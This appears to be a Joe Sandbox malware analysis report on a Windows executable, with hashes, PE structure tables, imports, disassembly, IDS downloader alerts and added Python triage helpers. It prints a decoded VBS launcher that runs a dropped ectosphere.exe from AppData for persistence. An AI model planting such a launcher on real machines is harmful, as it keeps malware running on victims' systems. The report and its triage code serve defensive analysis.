Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.A.l.l.e.n.e.\.e.c.t.o.s.p.h.e.r.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
Decoded preview (the file is UTF-16LE with no byte-order mark, so the raw preview shows every character followed by a null byte rendered as "."; 138 characters at two bytes each account for the 276-byte size):
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "C:\Users\alfons\AppData\Local\Allene\ectosphere.exe", 1
Set WshShell = Nothing
The launch target is hardcoded under the profile C:\Users\alfons\, not the C:\Users\user\ profile from which the dropping process (ectosphere.exe) actually ran on this analysis system.
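A decoder for this kind of dropped launcher, as an added example that is not part of the Joe Sandbox report or its tooling: it detects the BOM-less UTF-16LE encoding, reproduces the report's "."-for-non-printable preview rendering so the two can be compared, and pulls the WshShell.Run target out of the script. The sample bytes are constructed from the decoded script above (a line-feed terminator per line is an assumption; the preview only shows one non-printable character at each line end); nothing here reads the real dropped file.

```python
"""Triage helper for a Startup-folder .vbs launcher stored as UTF-16LE.

Added example, not part of the Joe Sandbox report. SAMPLE_VBS is constructed
from the decoded preview: three lines, one terminator character per line, no
byte-order mark. Re-encoded as UTF-16LE that is 138 code units = 276 bytes,
matching the reported size. The line-feed terminator is an assumption.
"""
from __future__ import annotations

import re
from typing import Optional

SAMPLE_VBS = (
    'Set WshShell = CreateObject("WScript.Shell")\n'
    'WshShell.Run "C:\\Users\\alfons\\AppData\\Local\\Allene\\ectosphere.exe", 1\n'
    'Set WshShell = Nothing\n'
).encode("utf-16-le")

# WshShell.Run "<command>"[, <intWindowStyle>[, <bWaitOnReturn>]]
RUN_RE = re.compile(r'\.Run\s+"([^"]+)"(?:\s*,\s*(\d+))?', re.IGNORECASE)


def decode_script(raw: bytes) -> tuple[str, str]:
    """Return (encoding, text). WSH runs UTF-16LE scripts with or without a BOM;
    a BOM-less one appears in hex/preview views as ASCII interleaved with NULs,
    which is exactly what the report's Preview of this file shows."""
    if raw.startswith(b"\xff\xfe"):
        return "utf-16-le-bom", raw[2:].decode("utf-16-le")
    if raw.startswith(b"\xfe\xff"):
        return "utf-16-be-bom", raw[2:].decode("utf-16-be")
    if raw.startswith(b"\xef\xbb\xbf"):
        return "utf-8-bom", raw[3:].decode("utf-8")
    head = raw[:64]
    # Heuristic for BOM-less UTF-16LE: every odd byte of the first 64 is NUL.
    if len(head) >= 4 and head[0] != 0 and all(b == 0 for b in head[1::2]):
        return "utf-16-le", raw.decode("utf-16-le")
    return "utf-8", raw.decode("utf-8", errors="replace")


def sandbox_preview(raw: bytes) -> str:
    """Render bytes the way the report's Preview field does: non-printables as '.'."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in raw)


def run_targets(script: str) -> list[tuple[str, Optional[int]]]:
    """(command, window style) for each WshShell.Run call; style 1 = SW_SHOWNORMAL."""
    return [(m.group(1), int(m.group(2)) if m.group(2) else None)
            for m in RUN_RE.finditer(script)]


def under_user_profile(path: str) -> bool:
    """A launch target under C:\\Users\\... (AppData, Temp) needs no admin rights
    to plant and is where dropped second stages normally live."""
    return path.lower().replace("/", "\\").startswith("c:\\users\\")


def triage(raw: bytes) -> dict:
    """One pass over a dropped .vbs: decode, pull Run targets, flag the suspicious ones."""
    encoding, script = decode_script(raw)
    targets = run_targets(script)
    return {
        "size": len(raw),
        "encoding": encoding,
        "targets": targets,
        "suspicious": [cmd for cmd, _ in targets if under_user_profile(cmd)],
    }
```

Run against the constructed bytes, triage() reports encoding utf-16-le, a single Run target under the alfons profile, and sandbox_preview() reproduces the report's "S.e.t. .W.s.h..." rendering; the same decode path handles BOM-prefixed UTF-16 and plain UTF-8 launchers, so it can be pointed at any file collected from a Startup folder.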
                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):7.051987070428753
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:6BRa130JDj.exe
                                                                                                                  File size:1'055'744 bytes
                                                                                                                  MD5:cb47b81059d6e0b15ad2ab00c3491c48
                                                                                                                  SHA1:4cf91a5e49a4d17f2c0d35bc52dee15ecdf155dc
                                                                                                                  SHA256:e036b840f2d4ce7a8e097d3f8309d2363239f837936161ffb9527cec62987f87
                                                                                                                  SHA512:ecce445bbe23f600d09357df1cd4488f958be9e2981b68a2dcba82dc41507f2b5f391ab97c7f13418b638b41f7dbb5e8d8d8946f317090d72b715eb23067d6ad
                                                                                                                  SSDEEP:24576:Du6J33O0c+JY5UZ+XC0kGso6FaPAlbrjFTSd7DqBWY:Nu0c++OCvkGs9FaP6FTy7D/Y
                                                                                                                  TLSH:3E25BD2273DEC360CB769173BF69B3056EBF7C610630B85B2F980D79A950161266C7A3
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                                                                  Icon Hash:32789ab292d2d20d
                                                                                                                  Entrypoint:0x427dcd
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x67526378 [Fri Dec 6 02:37:44 2024 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:5
                                                                                                                  OS Version Minor:1
                                                                                                                  File Version Major:5
                                                                                                                  File Version Minor:1
                                                                                                                  Subsystem Version Major:5
                                                                                                                  Subsystem Version Minor:1
                                                                                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                                                  Instruction
                                                                                                                  call 00007F2F108447AAh
                                                                                                                  jmp 00007F2F10837574h
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push edi
                                                                                                                  push esi
                                                                                                                  mov esi, dword ptr [esp+10h]
                                                                                                                  mov ecx, dword ptr [esp+14h]
                                                                                                                  mov edi, dword ptr [esp+0Ch]
                                                                                                                  mov eax, ecx
                                                                                                                  mov edx, ecx
                                                                                                                  add eax, esi
                                                                                                                  cmp edi, esi
                                                                                                                  jbe 00007F2F108376FAh
                                                                                                                  cmp edi, eax
                                                                                                                  jc 00007F2F10837A5Eh
                                                                                                                  bt dword ptr [004C31FCh], 01h
                                                                                                                  jnc 00007F2F108376F9h
                                                                                                                  rep movsb
                                                                                                                  jmp 00007F2F10837A0Ch
                                                                                                                  cmp ecx, 00000080h
                                                                                                                  jc 00007F2F108378C4h
                                                                                                                  mov eax, edi
                                                                                                                  xor eax, esi
                                                                                                                  test eax, 0000000Fh
                                                                                                                  jne 00007F2F10837700h
                                                                                                                  bt dword ptr [004BE324h], 01h
                                                                                                                  jc 00007F2F10837BD0h
                                                                                                                  bt dword ptr [004C31FCh], 00000000h
                                                                                                                  jnc 00007F2F1083789Dh
                                                                                                                  test edi, 00000003h
                                                                                                                  jne 00007F2F108378AEh
                                                                                                                  test esi, 00000003h
                                                                                                                  jne 00007F2F1083788Dh
                                                                                                                  bt edi, 02h
                                                                                                                  jnc 00007F2F108376FFh
                                                                                                                  mov eax, dword ptr [esi]
                                                                                                                  sub ecx, 04h
                                                                                                                  lea esi, dword ptr [esi+04h]
                                                                                                                  mov dword ptr [edi], eax
                                                                                                                  lea edi, dword ptr [edi+04h]
                                                                                                                  bt edi, 03h
                                                                                                                  jnc 00007F2F10837703h
                                                                                                                  movq xmm1, qword ptr [esi]
                                                                                                                  sub ecx, 08h
                                                                                                                  lea esi, dword ptr [esi+08h]
                                                                                                                  movq qword ptr [edi], xmm1
                                                                                                                  lea edi, dword ptr [edi+08h]
                                                                                                                  test esi, 00000007h
                                                                                                                  je 00007F2F10837755h
                                                                                                                  bt esi, 03h
                                                                                                                  jnc 00007F2F108377A8h
                                                                                                                  Programming Language:
                                                                                                                  • [ASM] VS2013 build 21005
                                                                                                                  • [ C ] VS2013 build 21005
                                                                                                                  • [C++] VS2013 build 21005
                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                  • [ASM] VS2013 UPD4 build 31101
                                                                                                                  • [RES] VS2013 build 21005
                                                                                                                  • [LNK] VS2013 UPD4 build 31101
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xba44c          0x17c         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc7000          0x393e0       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x101000         0x711c        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x92bc0          0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xa4870          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8f000          0x884         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type           Entropy             Characteristics
.text   0x1000           0x8dcc4       0x8de00   d28a820a1d9ff26cda02d12b888ba4b4  False     0.5728679102422908   data                6.676118058520316   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x8f000          0x2e10e       0x2e200   79b14b254506b0dbc8cd0ad67fb70ad9  False     0.33535526761517614  OpenPGP Public Key  5.76010872795207    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xbe000          0x8f74        0x5200    9f9d6f746f1a415a63de45f8b7983d33  False     0.1017530487804878   data                1.198745897703538   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0xc7000          0x393e0       0x39400   e4e99faa9f0566a92f34cbcd36bff62c  False     0.9555472161572053   data                7.935427462648645   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x101000         0x711c        0x7200    6fcae3cbbf6bfbabf5ec5bbe7cf612c3  False     0.7650767543859649   data                6.779031650454199   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA       Size     Type                                                                                   Language  Country        ZLIB Complexity
RT_ICON        0xc7458   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 192                         English   Great Britain  0.7466216216216216
RT_ICON        0xc7580   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors    English   Great Britain  0.3277027027027027
RT_ICON        0xc76a8   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 192                         English   Great Britain  0.3885135135135135
RT_ICON        0xc77d0   0xda8    Device independent bitmap graphic, 26 x 64 x 32, image size 3328, resolution 5669 x 5669 px/m  English  Great Britain  0.32179633867276886
RT_MENU        0xc8578   0x50     data                                                                                   English   Great Britain  0.9
RT_STRING      0xc85c8   0x594    data                                                                                   English   Great Britain  0.3333333333333333
RT_STRING      0xc8b5c   0x68a    data                                                                                   English   Great Britain  0.2747909199522103
RT_STRING      0xc91e8   0x490    data                                                                                   English   Great Britain  0.3715753424657534
RT_STRING      0xc9678   0x5fc    data                                                                                   English   Great Britain  0.3087467362924282
RT_STRING      0xc9c74   0x65c    data                                                                                   English   Great Britain  0.34336609336609336
RT_STRING      0xca2d0   0x466    data                                                                                   English   Great Britain  0.3605683836589698
RT_STRING      0xca738   0x158    Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0                       English   Great Britain  0.502906976744186
RT_RCDATA      0xca890   0x35631  data                                                                                                            1.0003475509093487
RT_GROUP_ICON  0xffec4   0x14     data                                                                                   English   Great Britain  1.25
RT_GROUP_ICON  0xffed8   0x14     data                                                                                   English   Great Britain  1.25
RT_GROUP_ICON  0xffeec   0x14     data                                                                                   English   Great Britain  1.15
RT_GROUP_ICON  0xfff00   0x14     data                                                                                   English   Great Britain  1.25
RT_VERSION     0xfff14   0xdc     data                                                                                   English   Great Britain  0.6181818181818182
RT_MANIFEST    0xffff0   0x3ef    ASCII text, with CRLF line terminators                                                 English   Great Britain  0.5074478649453823
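The section, data-directory and resource tables can be checked against each other. The following is an added example, not from the report or its tooling, that loads the rows from the three tables as constructed records and verifies the invariants a loader relies on: sections contiguous at section alignment, raw sizes file-aligned, every non-empty data directory inside one section, every resource inside .rsrc with no overlaps, and finally which section is high-entropy and which resource is large and incompressible enough to explain it (the report's ZLIB Complexity column is read as the compressed-to-original ratio, so roughly 1.0 means the bytes do not compress). The alignment constants 0x1000 and 0x200 are assumptions; the report does not print the optional-header values.

```python
"""Consistency checks over the section, data-directory and resource tables.

Added example, not part of the Joe Sandbox report. The three tables are
transcribed from the report into constructed records; the alignment values
(section alignment 0x1000, file alignment 0x200) are assumptions, since the
report does not print the optional header fields.
"""
from __future__ import annotations

from dataclasses import dataclass
from typing import Optional

SECTION_ALIGN = 0x1000  # assumed
FILE_ALIGN = 0x200      # assumed


@dataclass(frozen=True)
class Section:
    name: str
    va: int
    vsize: int
    rawsize: int
    entropy: float

    @property
    def end(self) -> int:  # extent treated as mapped: the larger of the two sizes
        return self.va + max(self.vsize, self.rawsize)


@dataclass(frozen=True)
class Resource:
    kind: str
    rva: int
    size: int
    zlib: float  # "ZLIB Complexity" column: ~1.0 means incompressible


SECTIONS = [
    Section(".text", 0x1000, 0x8dcc4, 0x8de00, 6.676),
    Section(".rdata", 0x8f000, 0x2e10e, 0x2e200, 5.760),
    Section(".data", 0xbe000, 0x8f74, 0x5200, 1.199),
    Section(".rsrc", 0xc7000, 0x393e0, 0x39400, 7.935),
    Section(".reloc", 0x101000, 0x711c, 0x7200, 6.779),
]

DIRECTORIES = {  # the non-empty IMAGE_DIRECTORY_ENTRY_* rows: name -> (rva, size)
    "IMPORT": (0xba44c, 0x17c), "RESOURCE": (0xc7000, 0x393e0), "BASERELOC": (0x101000, 0x711c),
    "DEBUG": (0x92bc0, 0x1c), "LOAD_CONFIG": (0xa4870, 0x40), "IAT": (0x8f000, 0x884),
}

RESOURCES = [Resource(*t) for t in [
    ("RT_ICON", 0xc7458, 0x128, 0.747), ("RT_ICON", 0xc7580, 0x128, 0.328),
    ("RT_ICON", 0xc76a8, 0x128, 0.389), ("RT_ICON", 0xc77d0, 0xda8, 0.322),
    ("RT_MENU", 0xc8578, 0x50, 0.9), ("RT_STRING", 0xc85c8, 0x594, 0.333),
    ("RT_STRING", 0xc8b5c, 0x68a, 0.275), ("RT_STRING", 0xc91e8, 0x490, 0.372),
    ("RT_STRING", 0xc9678, 0x5fc, 0.309), ("RT_STRING", 0xc9c74, 0x65c, 0.343),
    ("RT_STRING", 0xca2d0, 0x466, 0.361), ("RT_STRING", 0xca738, 0x158, 0.503),
    ("RT_RCDATA", 0xca890, 0x35631, 1.000),
    ("RT_GROUP_ICON", 0xffec4, 0x14, 1.25), ("RT_GROUP_ICON", 0xffed8, 0x14, 1.25),
    ("RT_GROUP_ICON", 0xffeec, 0x14, 1.15), ("RT_GROUP_ICON", 0xfff00, 0x14, 1.25),
    ("RT_VERSION", 0xfff14, 0xdc, 0.618), ("RT_MANIFEST", 0xffff0, 0x3ef, 0.507),
]]


def align_up(x: int, a: int) -> int:
    return (x + a - 1) // a * a


def section_for_rva(rva: int, sections=SECTIONS) -> Optional[Section]:
    """Which section an RVA is mapped into (None if it falls in a gap)."""
    return next((s for s in sections if s.va <= rva < s.end), None)


def layout_problems(sections=SECTIONS) -> list[str]:
    """Section-table invariants a loader relies on; a clean result means nothing
    was hidden between sections by hand-editing the headers."""
    out = []
    for prev, cur in zip(sections, sections[1:]):
        if cur.va != align_up(prev.va + prev.vsize, SECTION_ALIGN):
            out.append(f"{cur.name}: VA not contiguous with {prev.name}")
    for s in sections:
        if s.rawsize % FILE_ALIGN:
            out.append(f"{s.name}: raw size not a multiple of file alignment")
        if s.rawsize > align_up(s.vsize, FILE_ALIGN):
            out.append(f"{s.name}: more bytes on disk than are mapped")
    return out


def directory_problems(dirs=DIRECTORIES, sections=SECTIONS) -> list[str]:
    """Every non-empty data directory must lie wholly inside one section."""
    out = []
    for name, (rva, size) in dirs.items():
        first, last = section_for_rva(rva, sections), section_for_rva(rva + size - 1, sections)
        if first is None or first is not last:
            out.append(f"{name}: not contained in a single section")
    return out


def resource_problems(resources=RESOURCES, sections=SECTIONS) -> list[str]:
    """Resource data must sit inside .rsrc and entries must not overlap."""
    rsrc = next(s for s in sections if s.name == ".rsrc")
    out = [f"{r.kind}@{r.rva:#x}: outside .rsrc" for r in resources
           if not (rsrc.va <= r.rva and r.rva + r.size <= rsrc.va + rsrc.vsize)]
    out += [f"{b.kind}@{b.rva:#x}: overlaps {a.kind}@{a.rva:#x}"
            for a, b in zip(resources, resources[1:]) if b.rva < a.rva + a.size]
    return out


def payload_candidates(resources=RESOURCES, sections=SECTIONS,
                       entropy_min=7.0, zlib_min=0.95, size_min=0x1000):
    """High-entropy sections and the large incompressible resources that explain
    them: the usual place a compiled-script or packed second stage is stored."""
    hot = [s.name for s in sections if s.entropy >= entropy_min]
    blobs = [r for r in resources if r.zlib >= zlib_min and r.size >= size_min]
    return hot, blobs
```

On this sample every check comes back clean, and RT_RCDATA (0x35631 bytes, complexity 1.0) is the only candidate, which is what pushes .rsrc to an entropy of 7.94 while the icon, string and version resources stay around 0.3 to 0.7. The RT_GROUP_ICON entries also show complexity above 1, but at 20 bytes each that is just zlib framing overhead on tiny inputs, which is why the size floor in payload_candidates() matters.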
DLL: Imports
WSOCK32.dll: WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll: GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll: timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll: ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll: WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll: InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL: GetProcessMemoryInfo
IPHLPAPI.DLL: IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll: DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll: IsThemeActive
KERNEL32.dll: DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll: AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll: StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll: GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll: GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll: DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll: LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T01:27:42.543737+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49704 | 193.122.6.168 | 80 | TCP
2025-01-11T01:27:43.449972+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49704 | 193.122.6.168 | 80 | TCP
2025-01-11T01:27:44.030882+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49706 | 104.21.80.1 | 443 | TCP
